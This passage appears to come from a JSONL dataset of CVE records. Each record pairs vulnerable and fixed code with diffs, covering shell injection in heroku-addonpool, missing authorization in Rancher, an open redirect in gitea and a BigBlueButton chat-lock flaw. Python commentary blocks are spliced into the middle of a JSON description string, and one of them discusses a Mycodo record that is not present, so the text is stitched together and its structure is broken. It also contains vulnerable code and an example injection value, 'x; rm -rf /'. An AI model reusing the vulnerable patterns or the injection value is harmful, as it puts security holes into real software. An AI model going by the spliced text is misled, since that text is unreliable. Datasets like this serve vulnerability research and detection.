};\n\n return {add, remove, setup};\n};"}], "fix_func": [{"id": "fix_js_296_1", "commit": "b1a5b316473ac92d783f3d54ee048d54082da38d", "file_path": "index.js", "start_line": 9, "end_line": 122, "snippet": "module.exports = function HerokuAddonPool(id, app, opt) {\n const unused = [];\n const supply = new Map();\n const removed = new Map();\n const pending = new Map();\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n if(!RAPP.test(app)) throw new Error('Bad app name');\n\n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n };\n\n const supplySetOne = function(cfg) {\n return new Promise((fres, frej) => {\n const w = cfg.split('=');\n if(w[0].search(opt.config)<0) return;\n const key = w[0].substring(0, w[0].length-4);\n const val = {'value': w[1].substring(1, w[1].length-1)};\n cp.exec(`~/heroku addons:info ${key} --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n for(var r of stdout.toString().match(/[^\\r\\n]+/g)) {\n var k = _camel(r.startsWith('=')? 
'name' : r.split(':')[0]);\n val[k] = r.substring(r.match(/[\\S\\s]+(=|:)\\s+/g)[0].length);\n }\n supply.set(key, val);\n fres(key);\n });\n });\n };\n\n const supplySet = function() {\n return new Promise((fres, frej) => {\n cp.exec(`~/heroku config -s --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n var pro = Promise.resolve();\n for(var cfg of stdout.toString().match(/[^\\r\\n]+/g)||[])\n ((val) => pro = pro.then(() => supplySetOne(val)))(cfg);\n pro.then(() => fres(supply));\n });\n });\n };\n\n const setup = function() {\n log(`setup()`);\n return supplySet().then((ans) => {\n for(var key of supply.keys()) {\n log(`setup:addUnused(${key})`);\n unused.push(key);\n }\n return ans;\n });\n };\n\n const remove = function(ref) {\n return new Promise((fres) => {\n if(unused.length===0) {\n log(`remove:addPending(${ref})`);\n return pending.set(ref, fres);\n }\n const key = unused.shift();\n removed.set(ref, key);\n log(`remove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n });\n };\n\n const supplyReset = function(key) {\n log(`supplyReset(${key})`);\n const plan = supply.get(key).plan;\n return new Promise((fres, frej) => cp.exec(\n `~/heroku addons:destroy ${key} -a ${app} --confirm ${app} >/dev/null && `+\n `~/heroku addons:create ${plan} --as ${key} -a ${app} >/dev/null && `+\n `~/heroku config -s -a ${app} | grep ^${key}`,\n (err, stdout) => {\n const r = stdout.toString();\n fres(supply.get(key).value = r.substring(r.indexOf('=')+2, r.length-2));\n }\n ));\n };\n\n const pendingRemove = function() {\n if(!unused.length || !pending.size) return;\n const ref = pending.keys().next().value;\n const fres = pending.get(ref);\n pending.delete(ref);\n const key = unused.shift();\n removed.set(ref, key);\n log(`pendingRemove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n return ref;\n };\n\n const add = function(ref) {\n if(pending.has(ref)) {\n log(`add:removePending(${ref})`);\n pending.delete(ref);\n }\n if(removed.has(ref)) {\n const key = removed.get(ref);\n removed.delete(ref);\n log(`add:addUnused(${ref}, ${key})`);\n return supplyReset(key).then(() => {\n unused.push(key);\n pendingRemove();\n return ref;\n });\n }\n return Promise.resolve(ref);\n };\n\n return {add, remove, setup};\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -6,6 +6,7 @@\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n+ if(!RAPP.test(app)) throw new Error('Bad app name');\n \n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8297", "cve_description": "A vulnerability was found in kitsada8621 Digital Library Management System 1.0. It has been classified as problematic. Affected is the function JwtRefreshAuth of the file middleware/jwt_refresh_token_middleware.go. The manipulation of the argument Authorization leads to improper output neutralization for logs. It is possible to launch the attack remotely. The name of the patch is 81b3336b4c9240f0bf50c13cb8375cf860d945f1. It is recommended to apply a patch to fix this issue.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. 
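
# For the heroku-addonpool record above (CVE-2020-7634): the library interpolates the app
# name into shell strings such as `heroku config -s --app ${app}`, and the fix rejects the
# name up front with `if(!RAPP.test(app)) throw new Error('Bad app name')`. The sketch below
# re-states that guard in Python. The RAPP pattern here is an assumption (the patch references
# RAPP without showing its definition), based on Heroku's documented app-name rules of
# lowercase letters, digits and dashes.

import re
import subprocess

RAPP = re.compile(r"^[a-z][a-z0-9-]*$")   # assumed pattern, see note above

def heroku_config(app: str) -> str:
    if not RAPP.match(app):
        raise ValueError("Bad app name")  # `x; rm -rf /` never reaches a shell
    # Safer still: an argv list avoids shell parsing of the value altogether.
    out = subprocess.run(["heroku", "config", "-s", "--app", app],
                         capture_output=True, text=True, check=True)
    return out.stdout
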
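
# Looking back at the Mycodo record (CVE-2021-41185): the patch compares
# os.path.abspath(file_path).startswith(base). A bare string-prefix test can still accept a
# sibling directory, e.g. /srv/notes_evil when base is /srv/notes, so the sketch below
# compares whole path components instead. This is an editorial illustration of a stricter
# containment check, not Mycodo's shipped code.

import os

def is_inside(base: str, candidate: str) -> bool:
    base = os.path.realpath(base)            # resolve symlinks and ../ segments
    candidate = os.path.realpath(candidate)
    return os.path.commonpath([base, candidate]) == base

assert is_inside("/srv/notes", "/srv/notes/a.txt")
assert not is_inside("/srv/notes", "/srv/notes/../../etc/passwd")
assert not is_inside("/srv/notes", "/srv/notes_evil/a.txt")   # prefix test would pass this
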
As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/kitsada8621/Digital-Library-Management-System", "patch_url": ["https://github.com/kitsada8621/Digital-Library-Management-System/commit/81b3336b4c9240f0bf50c13cb8375cf860d945f1"], "programing_language": "Go", "vul_func": [{"id": "vul_go_233_1", "commit": "f495f3e", "file_path": "routes/borrow_route.go", "start_line": 10, "end_line": 27, "snippet": "func InitBorrowRoute(r *gin.RouterGroup) {\n\n\tborrowController := controllers.NewBorrowController()\n\tborrowRoute := r.Group(\"borrow\")\n\tborrowRoute.Use(middleware.JwtAuth())\n\n\tborrowRoute.POST(\"/create\", middleware.Role([]string{\"user\"}), borrowController.BorrowBook)\n\tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n\tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n\tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n\n\tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n\tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n\tborrowRoute.GET(\"/:id\", borrowController.BorrowDetails)\n\tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n\tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n\n}"}, {"id": "vul_go_233_2", "commit": "f495f3e", "file_path": "services/borrow_service.go", "start_line": 202, "end_line": 232, "snippet": "func (s *BorrowServiceImpl) UpdateBorrow(data dtos.BorrowDto, borrow models.Borrow) (int, error) {\n\n\tif borrow.BorrowStatus != 1 {\n\t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n\t}\n\n\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": borrow.BookId})\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tif book.BookStatus != 0 {\n\t\treturn http.StatusOK, fmt.Errorf(\"This book has been borrowed\")\n\t}\n\n\treturnDate, err := utils.StringToDate(data.ReturnDate)\n\tif err != nil {\n\t\treturn http.StatusBadRequest, err\n\t}\n\n\tif _, err := s.borrowRepository.Update(bson.M{\n\t\t\"$set\": bson.M{\n\t\t\t\"bookId\": book.ID,\n\t\t\t\"returnDate\": returnDate,\n\t\t},\n\t}, bson.M{\"_id\": borrow.ID}); err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn http.StatusOK, nil\n}"}], "fix_func": [{"id": "fix_go_233_1", "commit": "81b3336b4c9240f0bf50c13cb8375cf860d945f1", "file_path": "routes/borrow_route.go", "start_line": 10, "end_line": 27, "snippet": "func InitBorrowRoute(r *gin.RouterGroup) {\n\n\tborrowController := controllers.NewBorrowController()\n\tborrowRoute := r.Group(\"borrow\")\n\tborrowRoute.Use(middleware.JwtAuth())\n\n\tborrowRoute.POST(\"/create\", middleware.Role([]string{\"user\"}), borrowController.BorrowBook)\n\tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n\tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n\tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n\tborrowRoute.GET(\"/:id\", middleware.Role([]string{\"user\", \"admin\"}), borrowController.BorrowDetails)\n\n\tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n\tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n\tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n\tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n\n}"}, {"id": "fix_go_233_2", 
"commit": "81b3336b4c9240f0bf50c13cb8375cf860d945f1", "file_path": "services/borrow_service.go", "start_line": 202, "end_line": 237, "snippet": "func (s *BorrowServiceImpl) UpdateBorrow(data dtos.BorrowDto, borrow models.Borrow) (int, error) {\n\n\tif borrow.BorrowStatus != 1 {\n\t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n\t}\n\n\tbookId, err := primitive.ObjectIDFromHex(data.BookId)\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": bookId})\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tif book.BookStatus != 0 {\n\t\treturn http.StatusOK, fmt.Errorf(\"This book has been borrowed\")\n\t}\n\n\treturnDate, err := utils.StringToDate(data.ReturnDate)\n\tif err != nil {\n\t\treturn http.StatusBadRequest, err\n\t}\n\n\tif _, err := s.borrowRepository.Update(bson.M{\n\t\t\"$set\": bson.M{\n\t\t\t\"bookId\": book.ID,\n\t\t\t\"returnDate\": returnDate,\n\t\t},\n\t}, bson.M{\"_id\": borrow.ID}); err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn http.StatusOK, nil\n}"}], "vul_patch": "--- a/routes/borrow_route.go\n+++ b/routes/borrow_route.go\n@@ -8,10 +8,10 @@\n \tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n \tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n \tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n+\tborrowRoute.GET(\"/:id\", middleware.Role([]string{\"user\", \"admin\"}), borrowController.BorrowDetails)\n \n \tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n \tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n-\tborrowRoute.GET(\"/:id\", borrowController.BorrowDetails)\n \tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n \tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n \n\n--- a/services/borrow_service.go\n+++ b/services/borrow_service.go\n@@ -4,7 +4,12 @@\n \t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n \t}\n \n-\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": borrow.BookId})\n+\tbookId, err := primitive.ObjectIDFromHex(data.BookId)\n+\tif err != nil {\n+\t\treturn http.StatusInternalServerError, err\n+\t}\n+\n+\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": bookId})\n \tif err != nil {\n \t\treturn http.StatusInternalServerError, err\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21953", "cve_description": "A Missing Authorization vulnerability in of SUSE Rancher allows authenticated user to create an unauthorized shell pod and kubectl access in the local cluster This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/rancher/rancher", "patch_url": ["https://github.com/rancher/rancher/commit/fd40f5ffabadb87d60e8200971fe16d778b3d699", "https://github.com/rancher/rancher/commit/3d1a120a18279b1e943f8e0b1143240d2d3e7f7f", "https://github.com/rancher/rancher/commit/c44801f50f8a77383904ef0da4066ffcc8daf6ae"], "programing_language": "Go", "vul_func": [{"id": "vul_go_143_1", "commit": "1f516d1", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 47, 
"end_line": 80, "snippet": "func NewProxyMiddleware(sar v1.AuthorizationV1Interface,\n\tdialerFactory ClusterDialerFactory,\n\tclusters v3.ClusterCache,\n\tlocalSupport bool,\n\tlocalCluster http.Handler) (func(http.Handler) http.Handler, error) {\n\tcfg := authorizerfactory.DelegatingAuthorizerConfig{\n\t\tSubjectAccessReviewClient: sar,\n\t\tAllowCacheTTL: time.Second * time.Duration(settings.AuthorizationCacheTTLSeconds.GetInt()),\n\t\tDenyCacheTTL: time.Second * time.Duration(settings.AuthorizationDenyCacheTTLSeconds.GetInt()),\n\t\tWebhookRetryBackoff: &auth.WebhookBackoff,\n\t}\n\n\tauthorizer, err := cfg.New()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproxyHandler := NewProxyHandler(authorizer, dialerFactory, clusters)\n\n\tmux := gmux.NewRouter()\n\tmux.UseEncodedPath()\n\tmux.PathPrefix(\"/api\").HandlerFunc(proxyHandler.authLocalCluster(mux))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/{prefix:k8s/clusters/[^/]+}{suffix:/v1.*}\").MatcherFunc(proxyHandler.MatchNonLegacy(\"/k8s/clusters/\")).Handler(proxyHandler)\n\n\treturn func(handler http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(rw http.ResponseWriter, req *http.Request) {\n\t\t\tmux.NotFoundHandler = handler\n\t\t\tmux.ServeHTTP(rw, req)\n\t\t})\n\t}, nil\n}"}, {"id": "vul_go_143_2", "commit": "1f516d1", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 135, "end_line": 146, "snippet": "func (h *Handler) authLocalCluster(router *gmux.Router) func(rw http.ResponseWriter, r *http.Request) {\n\treturn func(rw http.ResponseWriter, req *http.Request) {\n\t\tauthed := h.userCanAccessCluster(req, \"local\")\n\t\tif !authed {\n\t\t\tif req.Context().Value(auth.CattleAuthFailed) != \"true\" {\n\t\t\t\trw.WriteHeader(http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n\t}\n}"}], "fix_func": [{"id": "fix_go_143_1", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 47, "end_line": 80, "snippet": "func NewProxyMiddleware(sar v1.AuthorizationV1Interface,\n\tdialerFactory ClusterDialerFactory,\n\tclusters v3.ClusterCache,\n\tlocalSupport bool,\n\tlocalCluster http.Handler) (func(http.Handler) http.Handler, error) {\n\tcfg := authorizerfactory.DelegatingAuthorizerConfig{\n\t\tSubjectAccessReviewClient: sar,\n\t\tAllowCacheTTL: time.Second * time.Duration(settings.AuthorizationCacheTTLSeconds.GetInt()),\n\t\tDenyCacheTTL: time.Second * time.Duration(settings.AuthorizationDenyCacheTTLSeconds.GetInt()),\n\t\tWebhookRetryBackoff: &auth.WebhookBackoff,\n\t}\n\n\tauthorizer, err := cfg.New()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproxyHandler := NewProxyHandler(authorizer, dialerFactory, clusters)\n\n\tmux := gmux.NewRouter()\n\tmux.UseEncodedPath()\n\tmux.PathPrefix(\"/api\").MatcherFunc(proxyHandler.matchManagementCRDs()).HandlerFunc(proxyHandler.authLocalCluster(mux))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", 
\"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/{prefix:k8s/clusters/[^/]+}{suffix:/v1.*}\").MatcherFunc(proxyHandler.MatchNonLegacy(\"/k8s/clusters/\")).Handler(proxyHandler)\n\n\treturn func(handler http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(rw http.ResponseWriter, req *http.Request) {\n\t\t\tmux.NotFoundHandler = handler\n\t\t\tmux.ServeHTTP(rw, req)\n\t\t})\n\t}, nil\n}"}, {"id": "fix_go_143_2", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 135, "end_line": 144, "snippet": "func (h *Handler) authLocalCluster(router *gmux.Router) func(rw http.ResponseWriter, r *http.Request) {\n\treturn func(rw http.ResponseWriter, req *http.Request) {\n\t\tauthed := h.userCanAccessCluster(req, \"local\")\n\t\tif !authed {\n\t\t\trw.WriteHeader(http.StatusForbidden)\n\t\t\treturn\n\t\t}\n\t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n\t}\n}"}, {"id": "fix_go_143_3", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 146, "end_line": 155, "snippet": "func (h *Handler) matchManagementCRDs() gmux.MatcherFunc {\n\treturn func(req *http.Request, match *gmux.RouteMatch) bool {\n\t\tsplitPath := strings.Split(req.URL.Path, \"/\")\n\t\tif len(splitPath) < 3 {\n\t\t\treturn false\n\t\t}\n\t\tapiGroup := splitPath[2]\n\t\treturn apiGroup == managementv3.GroupName\n\t}\n}"}], "vul_patch": "--- a/pkg/api/steve/proxy/proxy.go\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -19,7 +19,7 @@\n \n \tmux := gmux.NewRouter()\n \tmux.UseEncodedPath()\n-\tmux.PathPrefix(\"/api\").HandlerFunc(proxyHandler.authLocalCluster(mux))\n+\tmux.PathPrefix(\"/api\").MatcherFunc(proxyHandler.matchManagementCRDs()).HandlerFunc(proxyHandler.authLocalCluster(mux))\n \tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n \tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n \tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\n--- a/pkg/api/steve/proxy/proxy.go\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -2,10 +2,8 @@\n \treturn func(rw http.ResponseWriter, req *http.Request) {\n \t\tauthed := h.userCanAccessCluster(req, \"local\")\n \t\tif !authed {\n-\t\t\tif req.Context().Value(auth.CattleAuthFailed) != \"true\" {\n-\t\t\t\trw.WriteHeader(http.StatusUnauthorized)\n-\t\t\t\treturn\n-\t\t\t}\n+\t\t\trw.WriteHeader(http.StatusForbidden)\n+\t\t\treturn\n \t\t}\n \t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n \t}\n\n--- /dev/null\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -0,0 +1,10 @@\n+func (h *Handler) matchManagementCRDs() gmux.MatcherFunc {\n+\treturn func(req *http.Request, match *gmux.RouteMatch) bool {\n+\t\tsplitPath := strings.Split(req.URL.Path, \"/\")\n+\t\tif len(splitPath) < 3 {\n+\t\t\treturn false\n+\t\t}\n+\t\tapiGroup := splitPath[2]\n+\t\treturn apiGroup == 
managementv3.GroupName\n+\t}\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-3515", "cve_description": "Open Redirect in GitHub repository go-gitea/gitea prior to 1.19.4.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/9aaaf980f0ba15611f30568bd67bce3ec12954e2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_98_1", "commit": "263ed09", "file_path": "modules/context/context_response.go", "start_line": 46, "end_line": 68, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "fix_func": [{"id": "fix_go_98_1", "commit": "9aaaf98", "file_path": "modules/context/context_response.go", "start_line": 46, "end_line": 68, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\", \"\\\\\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && (loc[0] == '/' || loc[0] == '\\\\') && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "vul_patch": "--- a/modules/context/context_response.go\n+++ b/modules/context/context_response.go\n@@ -4,9 +4,9 @@\n \t\t\tcontinue\n \t\t}\n \n-\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n+\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\", \"\\\\\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n \t\t// Therefore we should ignore these redirect locations to prevent open redirects\n-\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n+\t\tif len(loc) > 1 && (loc[0] == '/' || loc[0] == '\\\\') && (loc[1] == '/' || loc[1] == '\\\\') {\n \t\t\tcontinue\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-27601", "cve_description": "In BigBlueButton before 2.2.7, lockSettingsProps.disablePrivateChat does not apply to already opened chats. 
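
# For the Rancher record above (CVE-2022-21953): the vulnerable authLocalCluster wrote a 401
# only under an extra condition and could fall through to serve the request anyway; the fix
# denies and returns unconditionally. A generic Python sketch of that fail-closed middleware
# shape follows -- an illustration of the control flow, not Rancher's Go code.

def auth_middleware(user_can_access_cluster, inner_handler):
    def handler(request):
        if not user_can_access_cluster(request, "local"):
            return 403, "Forbidden"   # deny AND stop -- no fall-through to the inner handler
        return inner_handler(request)
    return handler

handler = auth_middleware(lambda req, cluster: req.get("authed", False),
                          lambda req: (200, "ok"))
assert handler({"authed": True}) == (200, "ok")
assert handler({}) == (403, "Forbidden")
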
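
# For the gitea record above (CVE-2023-3515): browsers treat a Location beginning with "//",
# "\\" or "/\" as scheme-relative, i.e. "redirect to http(s)://REST_OF_PATH", so all four
# two-character slash combinations must be rejected, not just the two the vulnerable
# condition caught. Python port of the patched check, for illustration only.

def is_scheme_relative(loc: str) -> bool:
    return len(loc) > 1 and loc[0] in "/\\" and loc[1] in "/\\"

assert is_scheme_relative("//evil.example")
assert is_scheme_relative("/\\evil.example")
assert is_scheme_relative("\\/evil.example")    # missed before the patch
assert is_scheme_relative("\\\\evil.example")   # missed before the patch
assert not is_scheme_relative("/dashboard")     # ordinary in-app redirect still allowed
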
This occurs in bigbluebutton-html5/imports/ui/components/chat/service.js.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/bigbluebutton/bigbluebutton", "patch_url": ["https://github.com/bigbluebutton/bigbluebutton/commit/7dcdfb191373684bafa7b11cdd0128c9869040a1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_267_1", "commit": "a0e02932c6b00bf58bfee1ac31d8e6fa82263ee8", "file_path": "bigbluebutton-html5/imports/ui/components/chat/service.js", "start_line": 134, "end_line": 156, "snippet": "const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n { fields: { 'lockSettingsProps.disablePublicChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n { fields: { role: 1 } });\n const isReceiverModerator = receiver && receiver.role === ROLE_MODERATOR;\n\n if (meeting.lockSettingsProps !== undefined) {\n if (user.locked && user.role !== ROLE_MODERATOR) {\n if (isPublic) {\n return meeting.lockSettingsProps.disablePublicChat;\n }\n return !isReceiverModerator\n && meeting.lockSettingsProps.disablePrivateChat;\n }\n }\n\n return false;\n};"}], "fix_func": [{"id": "fix_js_267_1", "commit": "7dcdfb191373684bafa7b11cdd0128c9869040a1", "file_path": "bigbluebutton-html5/imports/ui/components/chat/service.js", "start_line": 134, "end_line": 155, "snippet": "const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n { fields: { 'lockSettingsProps.disablePublicChat': 1, 'lockSettingsProps.disablePrivateChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n { fields: { role: 1 } });\n const isReceiverModerator = receiver && receiver.role === ROLE_MODERATOR;\n\n if (meeting.lockSettingsProps !== undefined) {\n if (user.locked && user.role !== ROLE_MODERATOR) {\n if (isPublic) {\n return meeting.lockSettingsProps.disablePublicChat;\n }\n return !isReceiverModerator\n && meeting.lockSettingsProps.disablePrivateChat;\n }\n }\n\n return false;\n};"}], "vul_patch": "--- a/bigbluebutton-html5/imports/ui/components/chat/service.js\n+++ b/bigbluebutton-html5/imports/ui/components/chat/service.js\n@@ -1,8 +1,7 @@\n const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n-\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n- { fields: { 'lockSettingsProps.disablePublicChat': 1 } });\n+ { fields: { 'lockSettingsProps.disablePublicChat': 1, 'lockSettingsProps.disablePrivateChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-2584", "cve_description": "The dag-pb codec can panic when decoding invalid blocks.", "cwe_info": {"CWE-119": {"name": "Improper Restriction of Operations within the Bounds of a 
